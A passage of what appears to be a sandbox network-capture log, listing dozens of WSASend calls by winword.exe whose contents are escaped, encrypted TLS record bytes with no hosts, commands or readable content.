  396. "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x010\\xc4\\x1f9lk\\xf9\\x15\\xb2\\xae<fj\\xef-l3!\\xf4,\"\\xd8\\xd6z0\\xa5e\\xd3\\x98u\\xaf\t\\x8f\\x0b\\xf9\\x9c\\xcc\\xe6\\x9f\\xb2\\xd6\\x97q\\xa7\\xbc \\x0f\\x87\\x12\\x91z\\x1b\\xb7u\\xb9ypqc\\x069\\xf7\\xc5\\xaf=d\\x0c\\x08!\\xd1\\x12b\\x80o`\\xbbi9\\x19\\x1c\\xd7,\\xe8\\xc2a\\x01\\xa32\\xd0in\\x91n\\xbf\\x99+\\xc2\\xa9c7\\xdb\\xe7h\\xd9\\xe9n\\x1e\\xe0\\xe4\\x80\\xef\\xba\\xba\\xce\"\\x1f\\xd7+\\x04'\\xa7\\x94\\xc9\\xf0\\x87\\xc0\\xfdr\\x95\\xacu,\\x8b4\\xbcc\\xd7\\xcd\\x13\\xf43\\x925\\xd4i\\xc3u\\xc0\\xe4\\x814n\\xe1x\\xc8v\\xcf\\xa2\\xfeh\\xdfs\\x8eq<\\xad\\xcc\\x8a=\\xf7,\\xd4?r\\x0e\\x0f\\x88;_\\xfdh\\xbc\\x9a\\xbf\\xe4j\\xe9g\\x80\\xcev\\x83\\x01\\xe6\\x93\\xd9'\\x1c\\xb9b\\x7f\\xa4t\\xc1\\xbd\\xe7\\x983v\\xe9t\\xf7\\xde&\t\\x88\\xaaz6\\xb5n\\x13\\x01\\x9c;\\x88\\xb0\\x93\\xd3w\\xe4\n\\x86\\x85\\x00\\xc5y\\xe50\\x83*\\x92x-\\x930$0,"
  397.  
  398.  
  399. "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x0105\\xcb%\"w\\x0c\\xc3\\xd6\\x14\\xab\\x9f\\xc7;\\xc3q\\xd7\\xc5\\xba\\x16\\x87\\xd9\\x1e\\xc06\\xd5u\\xde\\x9242\\xb3\\xfe\\x13\\xce\\x07\\x88y\\xd7\\x11\\x0f\\x07\\xab\\x95\\xeb\\x98mgd\\x84\\xaf\\x9aoz\\xa6%\\x14*0\\xb1d\\xfd\\xbc\\xe5\\x05\\x8b\\xd4\\x01\\xe0\\xd8\\xaa\\xce9\\xbc\\xed2\\xcau\\xdc\\xe1\\xa8\\x1d\\xc1#\\xd1\\xf5h\\xf1\\xa9af\\xeb\\xa0\\x82\\x8f\\xa4\\xf0\\x9b\\x16t>\\x90\\xef\\x15\\x1a\\x9e)!mm\\xf8\\x8ba@^g\\xf8\\xa5\\x13\\xfa\\xbae!\\\\xa1a\\x9a-\\x03\\x87\\x7f8l\\xc5\\xf8\\x1a\\x9d\r\\xa0\\xf5\\xe6q\t<c\\xde\\xce\\x11=p\\xc2>,(\\xc1j\\xa2hljn\\xeb\\xbf\\x97\\xc1\\xe4\\x7f%\\x90d\\/\\xb4\\x8c\\xe3\\x16\\x9c\\xf6\\xe8\\xed\\x17\\x90v1@\\xd8\\x17\\xc0\\xbdlw\\x9fxg#\\x95\\xa3\\xad\\x1a\\xbe\\xf2\\x1f\"\\xaa\\xd3\\x91>\\xb1\\xceb\\xe4\\xba\\x04q+i\\xd6\n\\x0b\\xe57\\xe78u;<\\x16\\xd0\\xcac\\x96\\xba\\xde\\xc8\\xeb&\\xda\\x88\\xf3\\x95\\xb7\\x7f\\xf1b\\x10u,"
  400.  
  401.  
  402. "http_request": "winword.exe_WSASend_\\xc4\\x00q\\x00p\\xb3d\\x0f\"d\\x90-!\\xaf\\x97\\x1d\\xf7i&\\xf3pr\\xea8\\xc0\\xd0\\x0f\\xf5-\\x0e\\x8ax\\x8a\\x9d\\x8bet\\x91kqjl\\xc4\\x91.\\xd1k\\x1b\\x98b\\xd5\\xc2*\\x0br'\\x89\\x97<\\xe9\\x04\\xe956g\\x9fy\\x83\\xa01\\xafrz\\xef~a\\x1d\\xd7np\\xd2\\x10ys\\x02>\\x9ed\\x8f\\x07\\xf3\\x11\\xdd\\xbd\\xd0w\\x02\\xb5;\\x936\\xcb\\xa1;zw\\xfb\\xc1\\xf8\\xf3\\xf2\\x17\\xden\\xe5od\\x14\\xd7\\xfb\\xa7>\\xd5\\xd0\\x1969\\xad\\xb0\\x11\\xaa&w\\xe6\\xcb\\xb5\\x9d\\xdf\\x8ak\\xfc\\x9a.j\\x8f\\x1b\\xfbgr\\xd4-\\xd01_\\xc3\\xf4~\\xd47\\xaegb\\xfe\\x11\\xa9ohh\\xaf)\\x91\\x10\\\\x00tv\\xfb\\x9cj$\\xf0g\\x07\\x16\\x86e\\x86v\\x911ds\\xf8\\xe7\\xda\\x91\\x8a\\xb8?\\x8d\\xf6h\\x92\\x89\\x9f\\x19\\xeb\\xe3\\xd4&\\x06\\x97\\x84\\x14\\xe3\\xc8x\\xd5g7\\xda\\x1e\\x98\\xd7\\x86g\\x83\\x96\\x94g\\xcet\\x1f\\xbe\\xd0\\xe1\\xfd\\x1b\\xef\\x1a\\xd0bz\\x8e\\x1c\\x85q\\xf5\\xbb\\x90\\xc1\\x92\\xe17"
  403.  
  404.  
  405. "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x010\\xcde\\xeemr\\xa1>\\x14\\xc0\\xb0\\xddn\\x86\\xd0\\xfa\\xb8\\x94\\x8eb1\\xc4*\\xf1\\x03\\x13\n\\xaac\\xdc\\x1f3\\x0e\\xe7\\xc2\\xf1*p\\x85\\xaf\\x9f\\xb8@\\x9ec\\xc6\\x93\\x1d)\\xc78\\xb5b\\xa0\\x1e\\xf4\\x11\\x16a\\xa4\\x06\\x99=\\xe1v%6~\\x9e.mk\\xc4\\xe6\\xa9s\\xd9\\xb9\\xe5\\xb6,\\xd0\\x9d\\xd9\\x84\\x86\\xbb(\\x92\\xc2\\x19\\x98\\x1d\\xd8k\\xa6\\x9d\\xdd\\x0c\\xab\\x92l\\xab\\x8am%\\xb4\\xfc=cu\\xf9>i.\\x9d\\xd0\\xaa`\\x9e\\x9d\\xb3\\x1a\\xb08\\xff\\xc7\\xbe!\\xdbb@\n\\x87\\xc4p\\xea\\x9da\\x01\\xa4hb\\xccx\\xd2\\x8b\\x91?\\x1a8\\xcf\\x07?\\xc1\\x83`\\xd7\\xdd\\x0b\\xbd\\xf4>6\\xf6\\x1fp\\xa2\\x01\\x0f\\xfeu\\xe5\\x8eeiw\\xfa\\x80k:\\x94w\\x97ji\\xf9\\xf1\\xd2*\\x8e\\x973\\x0f\\xa68;\\xd83q\\x02%z72q\\xdc\\x91\\xae\\x1dp\\x06&\\x80-\\xb8\\xda\\x9c\\xae\\xfez\\xd4&\\x1c\n\\xffp\\x8cpa\\xbf \\x91\\x8f\\x19\\xe3?\\x16\\x96\\xf6n\\x82\\xcf\\x89\\xb8\\xd8%8\\xa3"
  406.  
  407.  
  408. "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x010+\\x05\\xbf(bx\\xed\\xc3\\x0f/\\xb9\\xf2n\\x0b\\x9a\\xd4\\xc1\\x11\\x18\\xfc\\x8a\\x1f\\xfd>\\x85\\x93`\\xbb\\xa4u\\xd1\\xda\\x97cd\\xfa\\xef\\x9c\\xb7\\xb1\\xf0\\x01cg\"\\xd4\\xb0\\xb8@\\xcdj\\xb9\\x00\\x8e\\x99\\x9c\\xbd!'\\xc4\\xfd\\xd8z7\\xe5,e\\x00\\xea\\xb4\\x84\\x08\\xea\\x96*\\xe4\\x98p\\xe9\\x1b/\\x1a/\\xc1\\x98\\xb6\\x1a\\x15\\xa0b\\xd0\\xd6\\x0bv\\xe0o\\x89\\8\\x08kk\\xf8\\x02x\\x1f\\x92\\xd1\\xeeq\\xfe\\x0cs'\\x0f\\xc5\\x85\\x13en\\x83\\xe6\\xe2\\x94\\xc6h\\x085c\\xe1\\xb9\\xe0\\xe7\\xb1\\xbc~\\xfd\\x167b\\xcb\\x82*\\xf8ky\\x02\\x99\\x16\\x1b\\xec0\\xec\\xf1\\xca\\x05\\xe7\\x9a\\x17j\\x88q\\x94y\\x171\\xb9p4r\\x12\\xfd\\x0f\\xc74\r\\x92\\xc6u\\x14r\\x86\\xd2\\x03\\xd5\\xb5\\xdb\\xc3@\\x05\\x95\\x12\\xed\\xa2`=\\x85\\xe4\\xdf\\x80\\xc9\\x1e\\xf7\\x95\\x9a\\x85\\xb7\\xef\\xfdh~\\xa0\\xa0\\xe2\\x02a\\xac\\xdc\\xc0\\xdf\\x12\\x08\\xd7\\xa4e\\x9ah\\xa7y.s\\xc8\\xc4\\x95\\xdc3\\xc1\\xf6_n\\xe5&\\xb6\\x05p\\xa1\\xbe\\x85"
  409.  
  410.  
  411. "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x010\\x8f\\x89\\xd7\\xde\\x18\\x16\\x93\\x12\\x1fv%9\\x00u\\x9e\\xf2\\x08\\xd3\\x11\\xd1'^\\xcd\\xd24\\xd5\\xd7\\x91<\\x03\\x9b\\xca\\xfdd\\xcf\\x16\\xe5z\\xde\\x0bi\\xf4\\xea\\xc1\\x12\\x02\\x02\\x1d\\x16\\xe6\\x1dd\\x1d\\x96\\xa4h\\xe8\\x03alzcb\\xd9\\x88\\xca\\xeb\\xb0\\x87\\x97\\xeb:gd\\xa3\\xe6\\x13\\x0ed\\xb82\\xd9\\x1e.\\xa6\\x0e3\\xeb\\xc2\\xf0\\xf5\\x18\\x90\\xfa\\xa0\\xb1\\x87 \\xed\\xb7\\xa6\\xb1\\xcb\\x05u\\xe4\\xde\\xb5\\x1ab'v\\x85\\xb4\\x9eqm'\\xb2\\xeeu\\x9a\\xa9\\xce\\x19\\x10\\xaf\\xb4\\x19|<!\\x11f\\x04\\xc0\\xf6\\xb8\\xf6\\xadp\\xdc\\xb4+\\xa4m\\xe2\\x12 j\\xc9d\\xd1\\xffb\\xf5\\xa1\\x18 \\xec\\xf5\\xde\\xd0\\xb47 \\xc7v\\xb1&\\x91\\xd1!\\xd9\\xc9\\x8c(\\xe3\\xaa\\x96w\\xd96\\x0by&\\x0e\"\\x0b\\xf2\\xc7\\xa1\\x8e\\xf3lf\\xc1^\\xd9!$\\xebg\\xbd\\x0e\\xc3\\x9cs(\\x0bf\\xe3\\xddnu\\x0c&\\x1b\\x8dx\\xc2\\x85\\x1f\\xc80\\xb1\\x8f#\\xd7\\x93\\xedd\\xb3\\xb1t\\x86\\xcbx\\xd9\\x85\\xd4\\x00nw\\x93't\\xe3\\xea\\x0e"
  412.  
  413.  
  414. "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x010\"\\xea\n\\xc0g\\xcc\\xaeoj\\xc5\\xf8\\xb0\\xc9\\x1c\\x19u\\xe52\\xd9v\\xe6\\xa9:/\\xf3\\x16\\xd4\\xcb\\xff\\x98\\xed\\xd6\\x91\\xf0z\\xdf\\xc5\\x9f\\x0e/\\xcbh\\x12\\x8f\\x01\\xfbk\\xc3\\xae;\\x06\\x83\\xe5j\\xb0\\xa8\\xe6ih\\x1fu\\x04\\x02h\\xff\\x9f\\x96\\xb1\\x82e)r\\xdc\\xf77#\\xc7pl5_\\xd2\\x88$\\x07\\xca\\xf4\r\nw\\x0f\\xbd\\xc9\\x1b\\xf7\\xf1\\xcd\\x89\\x1f\\xadz\\xe8\\xf4\\xf1\\x81\\xdeq\\xbf,'l`iu\\x85\\xaa\\x11\\xb0\\x8b\\xb1\\xd1h@\\xca>=pye\"@\\xb3\\xff$p\\xec\\xff\\xb8y\\xba\\x0f\\xb3\\x9fzl@\\x11\\xe6t\\xd9\\xc0\\xe0\\xe6g\\xe0n)\\xbe\\xd4\\x1ew\\x8c\\x1fy\\xa7\\xe7\n*7\\xc2\\xc2|(\\x14\\x81\\x85\\xee'\\x98\\xb0\\x96g\\xdcw\\xa9\\xb6\\xb2\\xc0\\x97\\xae\\xc7\\x08c\\x92\\x06\\xd0`\\x03n\\x8dy\\xe0y\\xb49\\xdb,\\xaa\\x93\\xd8\\x039\\x9b4g\\xf1\\xdb\\x88\\xb5\\x8c\\xefkze3\\x85|\\xca;2y\\xd9\\x91ul\\xfe\n\\xb0\t\\xe0t\\xa8\\x86p\\x08\\xf7\\x1c\\xc7"
  415.  
  416.  
  417. "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x010\\xa9nu\\xad\\x00$1q\\x96\\xe44'wd\\x00\\xa0\\x90\\xf8b&\\xb1\\xf8\\xc2t\\x87\\x9f\\x9e\\xb4\\xd2m\\xa5l\\xf6dw\\xe2r\\x10t/\\xf1?_\\x83\\x17\\xda\\xe1l8\\xbb\\xe3\\xeed^:\\xbcd\\x84\\x7f\\xee\\xf9\\xf9\\x1b\\x19\\xc1\\xd7\\xd8\\xe9'\\xae\\x8a\\xd5\\xa1\\xe1\\x9cf1x\\x7f\\xf5\\x1b\\xc8\\x0ed#h\\xdc?\\x99\\xb0j\\x00=q=vml*\\xfa#\\x1cg\\x1a\\xdc\\xf0/c\\x8a\\xcb\\xe56\\xa4\\xebw\\x18n\\x1b\\x15d\\x9bb\\x90\\xe8$\\x9b\\xe5\\xf2>me$wde\\x85p\\xb3\\xc5\\xcem\\xaeg\\xaa\\xbf\\xc9vh\\x7f(\\x96e%\\xa1\\x82\\xca\\xe3\\x90\\x91\\x02\\x12d\\x08\\x16*o\\xba\\xdb\\xb9\\xafw\\x08\\xf4\\x17m\\x9fa\\xd7\\x95\\x8f\\x07\\xe2~\t\\xcb\\x01\\x94\\xfd\\xf8\\xff=\\x1cx\\xde5(\\x88:\\xd5\\x8f\\xbf\\x13\\xb3\r\\xf4\\x1f\\x0c\\xba\\x9f\\xc0\\x0cjv\\xb8\\x88x|\\xf8\\xb6\\x1ah\\xfa\\x10\\x8bq\\xdf\\xfd\\xee\\x95s\\xb2\\x12\\x83\\xdd\\x8ae\\x87!b\\xb7k\\xa3\\xd4wf\\xaf\\xfc\\x84"
  418.  
  419.  
  420. "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x010\\xb3\\xe7h\\x84u_\\xa0\\x81t\\x9f\\x82f\\xdc\\x8dw\\x9d\\x98\\xd6\\x18\\x85\\xdf\\xa1).\\xc7\\xc5q\\xcd.\\xb1\\x12\\xd4\\x9e\\xc8\\xff\\xed\\xff<\\xaf|\\xce\\x83%\\xb9?\\xbb\\xa4\\x10\\x19\\x169\\xcbg\\xc1\\x12\\xa4\\x15\\xdd\\xcce\\x1d\\xc8\\xf2\\xd7,\\xeb\\xbf\\xe3\\xdc\\xe1\\xcb\\xf3\\xf0\\x8fv-\\xce\\x9e\\x9e\\xfcp\\xafszv\\xfd1\\xc9\\x05~\\xf0z5'x\\xca\\x96\\xdaa\\xbe\\xb5\\x92\\xb4\\xdb\\xe6\\xef\\xe4u> \\x0c\\xab\\xe1\\xcdq\\x0f\\x91/\\xbd\\xa0\t,\\xaa\\xc2u\\x8f\\xea\\xaeg\\xae\\x931i\\xac(<rng\\xbc\\x1b7\\xae\t\\x8f\\x8b<`\\xf1dt\\xd5\\xf1\\x94\\xb6p\\x8dgo\\x10\\x0ec\\xb8\\xde\\xdad|\\xff\\xf1\\x9ep\\xdfv4\\x1e'\\x98z\\xf5\\xe6\\xf9z\\xebj6s\\x8d\\x9e0)+5\\x9f\\xd8d\\xf9\\x1f3\\x12\\x1e\\xd2\\x14\\xdd\\xd0\\xb5\\x16h\\x9a\\x81\\xce\\xaa\\x8er\\x02j\\x9b\\xdb\\xf6\t\\xeb\\xa8\\x89\\xe3\\x90a\\xb1\\x1e\\x07\\xa12\\xa9)\\xc1\\x0e\\x0f\\x92^\\xa3s\\xc3\\xf5\\xa4\\x95\\x8c\\xd1\\xb9,"
  421.  
  422.  
  423. "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x010,\\x82\\xed\\xd2g\\x0e\\x18\\xe5\n\\x14\\xfa\\xcb\\xc0\\xcfbx3\\xf0\\xbe\\xd7\\x08bp\\x16\\xd3cnv\\xd3b\\x0f`a\\x15\\x00%\\xc9\\xbb\\x84\\xf3\\x10\\xd84\\x17\\x90\\xb1\\xd1i\\xf4x\\x99\\xde\\xc8\\xc5\\x94qh\\xd4\\x19ps\\xba\\xd4\\xd9\\xc9idu-\\xf4\\x01\\xffy\nr\\xbez\\xddu\\x13%\\xa9\\xe3\\xe9\\xach\\x84\\x1c\\x91\\xa6\\x1e\\xd67\\x16a\\xfd\\xfb\\xc6\\x0c\\x10\\xc5\\x99\\xca\\xef\\xf4b\\xeai\\xf5\\x8fj\\xef!\\x1f`l\\x9c\\x81:\\\\xf3\\xac\\xb3c\\x9e\n\\xa0\\xfbf/0\\\\x8cx@p,\\xe9e\\xe5\\\\xd0\\xdd\\xa9p\\x12\\xe8\\x8b\\xb8\\xbb\\xbf\\x90\\x98j\\xcf\\xd4\\x0f\\xcc\\xc3\\xe6\\xe7\\x1bk?n\\xa9\\x9e\\xba\\xab\\x86\\xc1\\xc2es\\x84\\xa3$\\xac1\\xf6j\\xfd\\xab\\x83\\x82\\xb8\\xf5\\x12\\x99\\x19\\xc2\\x14oo\\x1dx\\xed\\xfbdz\\x08pi\\x1d\\xce\\x991\\x11u\\x95\\xf4~\\xff\\x87\\x8e\\x8a\\x1d\\xcd\\x03k\\xe5c@\\xc4y\\xd9\\x19t~,\\xb0\\xf45m\\xa7\\x0c;i>h\\x88\\xe3\\x0e\\xd1h"
  424.  
  425.  
  426. "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x010\\xb8\\xc5\\xb5\\xae|\\x00m3;\\xc0\\xb6e<\\x13\\x96\\x0f\\xa8%\\xb0\\xb2\\xd9\\x8b\\x82\\xd0\\x9b\\x98\\xc4q\\xe0\\xb0\\x93p\\xd5j\\xa9x\\x81\\x17$3\\xe9-\\x9b\\xf0\\xcab\\x93\\x0e?h\\x0f\\xe7\\x10\\x18=\\xdc\\x95wzckl\\xa4\\x86\\x05\\xefh\\xbf\\xf2\n\\x82e\\x03f\\xc0eo`\\xd0hf\\xd0\\xea\\x18\\x88\\x00\\xa6\r\\xec\\xca\\xf1u\\x1f\\x0f\\xa6\\xf7x>j \\xce7\\\\xd4b\\xa2\\x7fu)\\x983\\xc1\\xf8\\xc3\\x93r\\x13\\xc5\"\\xa2\\x99\\xed\\x9ah\\xe8\\x89\\xe5;\\x99i\\x8b\\x94\\xdb\\xe8\\x89i\\x91\\x08rm/\\xba\\xc5z\\xf4\\xed.\\xa0\\x1fx\\xfd\\x7f\\xab\\xc9\\xa1j\\x05\\xe6\\xa8>\\x8a\\xf0\\xc5\\xf5\\x1e)\\xda\\xdc\\xb1\\x9a\\xce\\xe5\\xc9\\xc9\\x8a\\xa9l\\xf59\\xbcagwl\\xe2\\x18c=\\xe5\\x9dl\\x81\\xa6\\x8d\\x01z\\xbf\\xbc\\xe0\\x08\\xe8c\\xa6$\\xbb\\x9a\\x1cq\\x04\\xd8f`i\\xbdz\\xce\\xf3ttj\\xf4\"\\xf1\\xe0x\\x07fq\\xe1\\x0f\\xde\\xe8\\x16\t\\xaci4v\\xaew\\x17ft\\xf6\\xa0\\xfd\\xbe"
  427.  
  428.  
  429. "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x010\\x0b\\xba\\x89\\xc7\\xef\\xbf\\xcb\\xd5\\xc3\\xe3 :\\x9f\\xbe\\xd3\\x0f@\\xd1\\xdb\\x0c\\x1a\\xd1\\x15\\xae\\x85\\xce\\x88\\xc8\\xe9c\\xf5\\xc8s=\\xba$,\\xc6i\\xa4\\x9e`\\xc0\\xf6\\x8f\\xc26c`#\\x83\\x9fj\\x1cd7\\xc4\\x87\\x89\\x81\\x8a\\xaed\\x14r\\xcfn\\x90^l\\x8fx\\x11,\\xae\\xa1l\\xa36f\\x9flo\\xbfy\\xa2\\xfc\\x1f\\x93\\xe1\\xeb\\x17:&\\xb9bhuf\\x13\\x13q*\\xf2\\xb2\\x13\\xa7\\x85\\xe0\\x7f\\xec\\xbb\\x94\\x98\\xa6\\xc4\\xe9\\xf4\\xf6\\xf4x\\x90\\xb79\\xac\\xb1\rf\\xe9\\xc8ww\\xf8%>\\x89\\x95\\x7f|\\x00`\\xbf\\x8f:\\x1d\\xd6\\xc0'.s\\x1a@m\\xe5\\x17\\xf8(\\x8a\\xed\\x98l\\xa6c\\xab6\\xbb\\xca\\x04mg<\\x01\\x9f\\x99;lq#\\x8a6\\xf2\\x80a\\xef<p$\\xbf\\x84\\xaf.\\x89\\x8b\\xb6\\xe5r(\\x8d\\x97\\x86\\x0e\\xf2\\xf3qk\\x9e\\xecz\\xcbr\\xcb@\\xcd\\xf3\\xff\\xe5l\\xb5\\xb4\\xe0y\\xb0\\x00\\xedr\\xb0\\x16\\xe2w\\xfdum\\xd3\\x99u\\x01\\xdc\\x1d\\xab\\xbe\\xdeh\\xb2$\\xad\\xa8a"
  430.  
  431.  
  432. "http_request": "winword.exe_WSASend_~\\x01\\x01\\x00f\\x10\\x00\\x00ba\\x04ws\\xa0\\xa1\\xd9\\x16_\\x02\\x9e\\xbe2\\xbc\\xad-k^?\\xfa\\xa95\\x99\\xbc\\x18a\\x81-\\xca\\xec\\x8b\\xbc\\x05a\\xb9g\\xdc<<\\xc2p\\x06\\x9c\\xff\\x88\\x89?\\xd3^i\\xdb\\xa4k\\x8c\\xd9\\xd6z\\xc8<c\\xc7\\x9a\\xc4\\xc8\\x93\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000\\x1ci\\x08(\\xa6j\\x05\\x1d\\xc8t8\\x849\\x99ss\r\\x04i\\x83\\xa4\\x90\\xbc\\x85\\xc2\\x0b8\\x81\\xe2\\xc2\\xe7\\x81\\x16\\x8e\\x80\\xb5\\x84-\\xc2\\xe5\\xed\\xdb\\x87\\xf5w\\x86\\x04"
  433.  
  434.  
  435. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04\\xc2\\\\x05\\xeb\\xc8y\\x97\\xcb#\\x14\\x9aneaa\\xf1g\\x8a\\x04\\xbc\\xa8\\xc2onm\\xc95a\\x08\\xb83v\\xcb\\xd8\\xea*\\xd3\\xcd\\xf9^\\xdbif\\xb7\\xf6\\xeev\\x04\\xeb$i\\xf5c)\\xe8\\xe8\\xbc\\xbb\\xe8\\x01(\\xa9\\xeay\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000\\x04\\xf4\\x14\\xe8:\\xf3x.w\\xc5m\\xd7\\xb1e\\xc6p\\xa2\\xb7y2\\x15\\x9d\\x95$&\\x05\\xad\\x8e1\\x07?\\xb2\\x13\\xd3zv\\xd7\\x8f\\xd0\\xdb's'\\xd9rd\\x89\\xad"
  436.  
  437.  
  438. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04\\xd0\\xfb\\xde\\x87\\x16p\\xfco1\\x16t\\xc1\\x88\\xb4\\x95\\xee.v\\x0f\\x10p\\xc3\\xb6;\\xc8c\\xe4\\xe2\\xfb9\\xaaubp\\x8020s\\xe3\\xd8\\x90<k\\xeber\\x86\\xb4\\xf6\\xd0p:r\\x0f+\\xd7\\xba\\x84\\x83;\\x866\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000\\x04\\xfa\\xf3\\x7fu\\xef\\x98\\xb6\\x03\\xcc\\x13\\x06\\x87k!\\xd1^\\xd4\\xf8\\xbf\\x10\\x06r9\\x9eeh\\x1d\\xcd\\xad\\xae\t\\x99k\\xd1g\\x82c\\x0e\\xcbt\\xfe\\xf28\\xeb\\xd1\\x9d"
  439.  
  440.  
  441. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04n\\x0b\\xe3t\\xc5$\\xabp\\x8d\\x12\\xc0y\\x941\\xb0l\\xfar\\xeah\\x17\\x86\\xfc\\xd5\\xe4w\\xee\\x0b\\x7f\\xb8x\\xfc\\x00\\x13\\x8d\\xa10l\t\\xe1\\x84\\x05\\xce@_\\xab\\xaa\\x07~\\xf6\\xdd\\x05\\x18e\\x9bo\\xe9\\xc6\\xfc\\xe1\\xaa\\xa7\\xc9\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000\\xa3f\\xf7\\xee\\x0c\\xa7z\\xa6t\\x12\\xa3\\xc6\\x92\\x16\\xba\\x01ex\\x06\\x89\\xb9\\xfea\\xeb\\xd1-\\xbc\\xff\\xde/\\x91\\x82\\xa7\\xd8\\xe3\\xc0k\\xe2\\x90\\xe4\\xf1\\xcc,\\xb6\\x10\\x13\\xb0"
  442.  
  443.  
  444. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04\\xa3n\\x8b\\xe5y\\x02\\xce\\x03\\x00\\xa8\\x952\\xfe\\xe5j\\xc1\\xa6u\\x86\\xb1.z+w\\x90o\\x9df\\x87a\\xc0\\xab\\x0c\\xc9\\x91\\x87\\xfb\\x01=\\x1b\\xb2\\xf5\\x7fsuv\\xe3kv\\x1a\\xaf\\xadv\\x94\\xeb5ww\\xff?\\x9f\\xaa\\xf7\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000\\xfer\\xe31y\\xda\\x81\\xdb\\x8e\\xdb\\x13b u\\xe8z\\x05\\xc2\\xfbm\\xafe\\xdd,\\xd0\\x96\\xc0\\xf7\\x00\\x0e_\\x9b\\xab\\x92\\xc0\\xabu\\xe6#/\\xb1z\\xa8/p"
  445.  
  446.  
  447. "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x010\\xefrv_\\x1b\\x8b\\xf7\\xaf3\\xf7\\x18\\xfd\\x81\\x83\\xf6\\xde\\xba\\xc3.\\x7f/\\x19@\\x02\\xc5\\xf3\\xf33\\xb9\\xa8z\\xf4t\\xf5\\x9e\\xff\\x1da\\xa8\\xd9\\xb8\\x03\\xf7\\xa0\\xe2n\\x97\\xf6\\xe5m\\x003(w/o\\xb7\\xa0\\xd4+=\\xb7\\xc57\\xb3^\r\\xb5`\\xd9\\xd2\\x92f\\xf3\\xa3\\xef\\x03\\xfe\\xc7\\xce'!qs4p\\x006\\xb9\\xe8\\xc7\\xea\\xaf\\x13^\\xb0\\xdc\\x15g1\\xbf\\xb5\\x1d\\x01u;\\xe0c6\\xa7\\xe5\\xc4n?9\\x16avov7)^\\xc6\\x02\\xf5/\"v\\xf3>\\xe3sv\\x1e\\x87\\xe7\\xf5\\xa2j\\xe6\\xa0s\\x9d#\\xc3\\x9b\\x85\\x82h\\x90r\\xce\\x8f\\xba\\x0cdsva\\xe02z\\xf1\\x81g\\xb4kp\\xa4\\xf8l\\xe7\\x9f\\x10\"\\xb1\\xd5\\x9a\\xeak9\\xb2\\xf4e\\xa7m\\xd9\\x86\\xb8\\x95>\\x04\\xc1r\\xa5\\xc3\\xbax\\x0cayb\\xa8\\xf0\\xa2v\"\\xdao\\x08\\xb1\\xfbb\\x9f\\xd1\\x0b\\xfc\\xd1\\xb8\\xce\\x9e\\xe3~\\xe8%\\xf2\\xe3\\xc6)i\\x84-\\xc0\\x06\\x96j\n\\xea\\xf1\\xab\r\\xa2i\\xf08\\xe7\\x8c\\xcb"
  448.  
  449.  
  450. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04:ho5\"\\xfcm\\xa8\\xc7\\xd8\\xfc\\x1c9\\x1c\\x9d\\x80\\xda~\\x8b\\xa0m\\xe7k-0\\x03\\xab\\xdf\\xf4\\xa1\\xd7<\\xbb\\x1a`k\\xd68\\xd7\\xa5\\xbb\\xf9\\xe4\\%\\x0e\\xee\\x0fmi\\xbea\\x81g\"z\\xb9\\xd7\\x14g%3\\x88\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000\"\\x91\\x8b\\xee\\x02i\\x90p\\xdd\\x07tc\\xad\\x1bf|\\x01`\\xdb\\xbd\t\\xc1sz\\xe6\\xf3\\xd3|`\\x1fv\\xfer\\xe6\\x8b\\x9by\\xc6\\xb4\\x96\\xf9x\\xa2\\x00\\xc8\\xcf\\x18m"
  451.  
  452.  
  453. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04\\x96\\x06l\\xfd\\x0c\\x12,\\x8a\\xff\\x93\\xdb\\xfc%\\xbdc\\x8d\\xab\\xa5\\xe8\\xb8\\xed\\xe3%\\xa0\\xc05\\xfc\\xb9\\x80\\xfe\\xdbo\\xb6'yj\\xc0\\x02zi=\\x15tt\\xe8\\xe5#\\xf3f0\\x07\\x96\\xb4\\xb9\\xe1ox\\x11n\\xfbv'\\xc0\\xb5\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000/r\\xbb\\x91\\x1cae\\x83x\\x1ahi\\xc6\\x82|\\x1f\\xe1|\\xe3a:\\xa8\\xf3\\x85\\xeeg\\xc0%\\x8b\\xdfc6\\xcdt\\xeb\\xc2h_\\x0b\\x9d\\xf5m\\xcb-\\xd1\\x07\\xa2"
  454.  
  455.  
